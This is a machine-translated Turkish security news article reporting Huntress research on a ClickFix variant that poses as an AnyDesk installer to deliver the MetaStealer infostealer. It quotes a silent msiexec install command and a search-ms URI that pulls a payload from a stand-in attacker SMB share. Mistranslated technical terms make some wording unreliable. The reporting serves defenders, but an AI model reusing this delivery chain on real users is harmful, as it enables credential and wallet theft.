Metastealer Infostealer’ı yaymak için meşru bir Anydesk yükleyicisi olarak maskelenen ClickFix saldırısının yeni bir varyantı ortaya çıktı.
Bu kampanya, kurbanları hazırlanmış bir Windows protokol işleyicisini yürütmeye teşvik etmek için sahte bir Cloudflare Turnstile doğrulama sayfasını kullanıyor ve sonuçta PDF olarak gizlenmiş kötü niyetli bir MSI paketi sunuyor.
Kuruluşlar savunmalarını geleneksel sosyal mühendislik tekniklerine karşı sertleştirmeye devam ettikçe, tehdit aktörleri oyun kitaplarını geliştiriyor, tanıdık cazibeleri beklenmedik sistem bileşenleri ile tespit etmek ve hassas kimlik bilgilerini çalmak için harmanlıyorlar.
Ağustos ayı başlarında, AnyDesk Remote Access Aracını arayan kullanıcılar AnyDeesk’te aldatıcı bir açılış sayfasıyla karşılaştı[.]Mürekkep/İndir/Anydesk.html.
Sayfa, “insan olduğunuzu doğrulayın” düğmesi ile birlikte standart bir Cloudflare turnikesi istemi gibi görünen şeyi görüntüledi.
.webp)
Tıkladıktan sonra, kurbanlar klasik ClickFix saldırılarında olduğu gibi bir komutu çalıştırma iletişim kutusuna yapıştırmaya yönlendirilmedi, bunun yerine Search-MS URI işleyicisi aracılığıyla Windows Dosya Gezgini’ne yönlendirildi.
Huntress araştırmacıları, yeniden yönlendirme mekanizmasındaki bu ince değişimin, daha az izlenen Windows arama protokolünden yararlandığını ve güvenlik ekiplerini hazırlıksız yakaladığını belirtti.
.webp)
Search-MS URI, uzak KOBİ payı çağırdığında, kurbanın sistemine “anydesk.pdf.lnk” adlı bir Windows kısayolu dosyası sunarak enfeksiyon zinciri açılır.
Panodan ötürü PowerShell komutlarına dayanan dosya veriminden farklı olarak, bu saldırı LNK yükünü otomatik olarak başlatır, bu da iki bileşeni indirmek ve yüklemek için bir komut dosyası yürütür: Microsoft Edge’de barındırılan ve chat1’den servis edilen bir tuzak PDF.[.]mağaza.
Tuzak dosyası aslında % computernam % ortam değişkenini kullanarak kurbanın ana bilgisayar adını dinamik olarak indirme URL’sine dahil eden bir MSI paketidir. İndirildikten sonra, MSI şu şekilde yüklenir:-
msiexec /i "%TEMP%\%%COMPUTERNAME%%.msi" /quietBu komut tamamlandıktan sonra, meta veriler iki birincil eseri ortaya çıkarır: kurulumun düzenlenmesinden sorumlu bir CustomActionDLL ve LS26.exe, Metastealer damlası ve temizleme komut dosyalarını içeren bir taksi arşivi.
.webp)
Huntress analistleri, LS26.exe’nin özel exe koruyucusu ile korunduğunu ve tarayıcılardan kimlik bilgisi hasadı ve kripto-cüzdan hırsızlığı da dahil olmak üzere metaslealer’ın karakteristik davranışlarını sergilediğini belirledi.
Enfeksiyon mekanizması
Bu kampanyanın merkezinde, Windows aramasının ustaca kullanımı yatıyor. Search-MS URI protokolünü çağırarak saldırganlar, sertleştirilmiş ortamlardaki çalışma iletişim kutusu kısıtlamalarını atlar ve doğrudan dosya explorer üzerinden yükler getirir.
Aşağıdaki URI snippet’i yeniden yönlendirmeyi göstermektedir:-
search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\attacker-smb\shareKullanıcı Dosya Explorer istemini onayladıktan sonra, LNK dosyası indirme rutinlerini sessizce yürütür. MSI’s CustomActionDLL daha sonra ls26.exe ve 1.JS’yi açan ikili.bz.wrappedSetupprogram’ın alınmasını tetikler.
JavaScript dosyası aracı dosyaların kaldırılmasını sağlarken, LS26.exe veri açığa çıkma aşamasını başlatır.
Meşru Windows protokollerini ve dosya işlemeyi kötüye kullanarak, bu saldırı, son yük yükü kötü niyetli mantığını ortaya çıkarana kadar sanal alan algılama ve güvenlik uyarılarından kaçınır.
Bu ortaya çıkan taktik, güvenilir sistem özelliklerinin alışılmadık uzantılarının izlenmesinin öneminin altını çizmektedir.
Savunucular, bu sofistike sosyal mühendislik kampanyalarını tespit etmek ve bozmak için MSI kurulumlarının katı protokol işleyici politikaları, KOBİ denetimi ve bağlamsal analiz yapmayı düşünmelidir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.